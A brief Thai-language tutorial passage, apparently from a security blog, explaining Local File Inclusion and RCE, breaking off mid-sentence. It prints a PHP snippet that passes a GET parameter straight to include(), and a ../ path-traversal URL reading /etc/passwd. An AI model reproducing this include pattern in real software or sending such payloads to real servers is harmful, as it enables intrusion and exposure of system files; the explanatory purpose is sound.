Local file inclusion

Local File Inclusion (LFI) และ Remote Code Execution (RCE)

วันนี้จะพูดถึงช่องโหว่ Local File Inclusion (LFI) และ Remote Code Execution (RCE) จากการทำ LFI ตัวอย่าง code

<?php
$file = $_GET['file'];
if(isset($file))
{
  include("$file");
}

<?php

$file = $_GET['file'];

if(isset($file))

{

include("$file");

}

โดยปกติจะเป็นการเรียกใช้งานเป็น

http://example.com/index.php?file=contact.php

1	http://example.com/index.php?file=contact.php

ทีนี้ถ้าเป็นการโจมตี LFI ก็จะเป็น

http://example.com/index.php?file=../../../../../../../../etc/passwd

1	http://example.com/index.php?file=../../../../../../../../etc/passwd

โดยจาก code จะเห็นว่ามีการใช้งาน function include นำ content ของไฟล์ file…